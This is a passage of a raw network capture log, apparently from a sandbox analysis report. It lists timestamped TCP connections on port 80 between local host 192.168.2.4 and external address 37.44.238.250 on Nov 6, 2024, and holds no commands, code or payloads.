                                                                    Nov 6, 2024 03:38:08.327939987 CET4983380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:08.327949047 CET4982780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:08.333163977 CET804983337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:08.673830986 CET4983380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:08.678929090 CET804983337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:09.152043104 CET804983337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:09.231482983 CET804983337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:09.231570005 CET4983380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:09.355381966 CET4983380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:09.355670929 CET4983880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:09.360497952 CET804983837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:09.360573053 CET4983880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:09.360641003 CET804983337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:09.360687971 CET4983880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:09.360691071 CET4983380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:09.365511894 CET804983837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:09.610739946 CET4983880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:09.611783981 CET4984180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:09.616609097 CET804984137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:09.616683960 CET4984180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:09.616775990 CET4984180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:09.621572971 CET804984137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:09.661618948 CET804983837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:09.732014894 CET4984280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:09.740797997 CET804984237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:09.740871906 CET4984280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:09.740973949 CET4984280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:09.748425007 CET804984237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:09.969501019 CET4984180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:10.094511032 CET4984280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:10.149058104 CET804983837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:10.149111986 CET4983880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:10.150373936 CET804984137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:10.150388002 CET804984137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:10.150602102 CET804984237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:10.463767052 CET804984137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:10.531939030 CET4984180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:10.538990021 CET804984137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:10.555252075 CET804984237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:10.627149105 CET804984237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:10.627213001 CET4984280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:10.719758987 CET4984180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:10.748064041 CET4984180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:10.748142958 CET4984280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:10.748836040 CET4985080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:10.753262043 CET804984137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:10.753336906 CET4984180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:10.753622055 CET804985037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:10.753689051 CET4985080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:10.753768921 CET804984237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:10.753793955 CET4985080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:10.753812075 CET4984280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:10.758507967 CET804985037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:11.112481117 CET4985080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:11.117322922 CET804985037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:11.564965963 CET804985037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:11.625688076 CET4985080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:11.643349886 CET804985037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:11.816544056 CET4985080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:11.817203999 CET4985680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:11.821664095 CET804985037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:11.821968079 CET804985637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:11.822020054 CET4985080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:11.822048903 CET4985680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:11.822204113 CET4985680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:11.826920033 CET804985637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:12.173727036 CET4985680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:12.178605080 CET804985637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:12.632369995 CET804985637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:12.700288057 CET804985637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:12.700335979 CET4985680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:12.883012056 CET4985680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:12.883977890 CET4986380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:12.888223886 CET804985637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:12.888281107 CET4985680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:12.888740063 CET804986337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:12.888803959 CET4986380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:12.888912916 CET4986380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:12.893851042 CET804986337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:13.235120058 CET4986380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:13.240130901 CET804986337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:13.698288918 CET804986337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:13.773247957 CET804986337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:13.773307085 CET4986380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:14.123615026 CET4986380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:14.125242949 CET4986980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:14.128814936 CET804986337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:14.128860950 CET4986380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:14.130076885 CET804986937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:14.130136013 CET4986980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:14.130297899 CET4986980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:14.135020971 CET804986937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:14.486221075 CET4986980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:14.491010904 CET804986937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:14.951869011 CET804986937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:15.016302109 CET4986980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:15.031677008 CET804986937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:15.125673056 CET4986980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:15.200542927 CET4986980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:15.205780983 CET804986937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:15.205832958 CET4986980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:15.235676050 CET4987580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:15.240475893 CET804987537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:15.240550041 CET4987580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:15.240705967 CET4987580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:15.245448112 CET804987537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:15.548664093 CET4987580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:15.550947905 CET4987980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:15.555738926 CET804987937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:15.555795908 CET4987980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:15.555893898 CET4987980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:15.560631990 CET804987937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:15.597616911 CET804987537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:15.674488068 CET4988280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:15.679503918 CET804988237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:15.679589033 CET4988280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:15.679666996 CET4988280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:15.684386015 CET804988237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:15.830522060 CET804987537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:15.830660105 CET4987580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:15.907191992 CET4987980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:15.912120104 CET804987937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:15.912354946 CET804987937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:16.032032013 CET4988280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:16.036823034 CET804988237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:16.377175093 CET804987937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:16.447371960 CET804987937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:16.449366093 CET4987980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:16.480392933 CET804988237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:16.549379110 CET804988237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:16.549511909 CET4988280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:16.794322968 CET4987980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:16.794481993 CET4988280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:16.795162916 CET4988880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:16.799555063 CET804987937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:16.799957037 CET804988837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:16.800026894 CET4987980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:16.800071001 CET4988880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:16.800165892 CET804988237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:16.800208092 CET4988880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:16.800221920 CET4988280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:16.804960012 CET804988837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:17.157448053 CET4988880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:17.162374973 CET804988837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:17.601785898 CET804988837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:17.676377058 CET804988837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:17.676593065 CET4988880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:17.793742895 CET4988880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:17.794564962 CET4989480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:17.799055099 CET804988837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:17.799134970 CET4988880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:17.799391985 CET804989437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:17.799458027 CET4989480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:17.799554110 CET4989480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:17.804258108 CET804989437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:18.157037020 CET4989480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:18.162693977 CET804989437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:18.617922068 CET804989437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:18.694787025 CET804989437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:18.697488070 CET4989480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:18.824999094 CET4989480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:18.825706959 CET4990080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:18.830415010 CET804989437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:18.830521107 CET804990037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:18.830585003 CET4989480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:18.830615997 CET4990080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:18.830717087 CET4990080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:18.835499048 CET804990037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:19.188456059 CET4990080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:19.195616007 CET804990037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:19.641052961 CET804990037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:19.713350058 CET804990037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:19.713529110 CET4990080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:20.090816975 CET4990080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:20.091939926 CET4990680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:20.096021891 CET804990037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:20.096072912 CET4990080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:20.096750975 CET804990637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:20.096811056 CET4990680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:20.096970081 CET4990680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:20.101785898 CET804990637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:20.454619884 CET4990680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:20.459609032 CET804990637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:20.906105042 CET804990637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:21.016315937 CET4990680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:21.413480997 CET804990637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:21.455239058 CET4991680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:21.460150003 CET804991637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:21.461010933 CET4991680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:21.461157084 CET4991680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:21.465976000 CET804991637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:21.517313957 CET4990680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:21.536125898 CET4991780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:21.542275906 CET804991737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:21.545543909 CET4991780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:21.545860052 CET4991780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:21.550596952 CET804991737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:21.813373089 CET4991680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:21.819390059 CET804991637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:21.819622040 CET804991637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:21.891655922 CET4991780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:21.896588087 CET804991737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:22.262053967 CET804991637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:22.334856987 CET4991680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:22.340382099 CET804991637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:22.346046925 CET804991737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:22.419670105 CET804991737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:22.419810057 CET4991780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:22.516335964 CET4991680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:22.820878983 CET4991680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:22.820952892 CET4991780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:22.821271896 CET4990680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:22.825953007 CET804991637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:22.826028109 CET4991680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:22.826575041 CET804991737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:22.826627016 CET4991780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:22.826647997 CET804990637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:22.826695919 CET4990680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:22.866301060 CET4992380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:23.055134058 CET804992337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:23.055207014 CET4992380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:23.055449963 CET4992380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:23.060219049 CET804992337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:23.407013893 CET4992380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:23.412398100 CET804992337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:23.875431061 CET804992337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:23.946238995 CET804992337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:23.947299957 CET4992380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:24.058753967 CET4992380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:24.059067965 CET4993280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:24.063827038 CET804992337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:24.063855886 CET804993237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:24.063927889 CET4992380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:24.063963890 CET4993280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:24.064076900 CET4993280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:24.068790913 CET804993237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:24.422633886 CET4993280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:24.427550077 CET804993237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:24.874880075 CET804993237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:24.953320980 CET804993237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:24.953953028 CET4993280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:25.613722086 CET4993280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:25.614433050 CET4993880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:25.619234085 CET804993237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:25.619260073 CET804993837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:25.619291067 CET4993280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:25.619343042 CET4993880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:25.619615078 CET4993880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:25.624347925 CET804993837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:25.969526052 CET4993880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:25.974380016 CET804993837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:26.428690910 CET804993837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:26.505240917 CET804993837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:26.505302906 CET4993880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:26.626441002 CET4993880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:26.627042055 CET4994780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:26.953844070 CET4993880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:27.345691919 CET4994880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:27.472883940 CET4994980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:27.653670073 CET804994737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:27.653846025 CET4994780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:27.654500961 CET804993837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:27.654512882 CET804994837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:27.654525042 CET804994937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:27.654576063 CET4994880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:27.654597998 CET4994980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:27.654742002 CET4994880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:27.654814959 CET4994980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:27.655349970 CET804993837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:27.657650948 CET4993880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:27.660413027 CET804994837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:27.660480022 CET804994937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.003087044 CET4994880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.003182888 CET4994980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.008472919 CET804994837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.008482933 CET804994837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.008491039 CET804994937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.468159914 CET804994937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.499973059 CET804994837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.531955957 CET4994980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.547694921 CET804994937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.577785015 CET804994837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.577851057 CET4994880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.719635010 CET4994980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.817426920 CET804994837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.817544937 CET4994880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.817550898 CET804994937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.817600965 CET4994980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.869066954 CET4994880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.869138002 CET4994980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.869807959 CET4995580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.874211073 CET804994837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.874270916 CET4994880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.874557018 CET804995537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.874578953 CET804994937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.874614000 CET4995580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.874634981 CET4994980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.874754906 CET4995580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.879489899 CET804995537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:29.219631910 CET4995580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:29.224476099 CET804995537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:29.685631990 CET804995537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:29.750787973 CET4995580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:29.759912014 CET804995537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:29.891747952 CET4995580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:29.892436028 CET4996380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:29.896918058 CET804995537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:29.896971941 CET4995580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:29.897164106 CET804996337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:29.897265911 CET4996380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:29.897387028 CET4996380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:29.902158022 CET804996337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:30.250782967 CET4996380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:30.255758047 CET804996337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:30.713701963 CET804996337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:30.786015034 CET804996337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:30.787410975 CET4996380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:31.070871115 CET4996380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:31.072952986 CET4996980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:31.075959921 CET804996337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:31.076179028 CET4996380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:31.077763081 CET804996937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:31.077848911 CET4996980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:31.077939034 CET4996980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:31.082912922 CET804996937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:31.422900915 CET4996980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:31.427680969 CET804996937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:31.884031057 CET804996937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:31.953850985 CET4996980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:31.959028006 CET804996937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:32.073879004 CET4996980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:32.074634075 CET4997780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:32.078876019 CET804996937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:32.078929901 CET4996980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:32.079400063 CET804997737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:32.079471111 CET4997780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:32.079571962 CET4997780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:32.084263086 CET804997737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:32.438370943 CET4997780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:32.443367958 CET804997737.44.238.250192.168.2.4
